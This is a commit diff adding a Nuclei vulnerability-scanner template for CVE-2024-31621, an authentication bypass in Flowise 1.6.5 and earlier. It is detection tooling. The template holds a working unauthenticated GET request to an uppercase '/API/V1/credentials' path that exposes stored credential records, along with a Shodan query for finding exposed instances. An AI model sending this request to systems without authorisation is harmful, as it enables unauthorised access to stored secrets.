Create CVE-2024-31621.yaml

http/cves/2024/CVE-2024-31621.yaml

@@ -0,0 +1,35 @@
+id: CVE-2024-31621
+
+info:
+  name: Flowise 1.6.5 - Authentication Bypass
+  author: DhiyaneshDK
+  severity: high
+  description: |
+    The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability.
+  reference:
+    - https://www.exploit-db.com/exploits/52001
+    - https://github.com/FlowiseAI/Flowise/releases
+    - https://flowiseai.com/
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.favicon.hash:-2051052918
+  tags: cve,cve2024,auth-bypass,flowise
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/API/V1/credentials"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"credentialName":'
+          - '"updatedDate":'
+        condition: and
+
+      - type: status
+        status:
+          - 200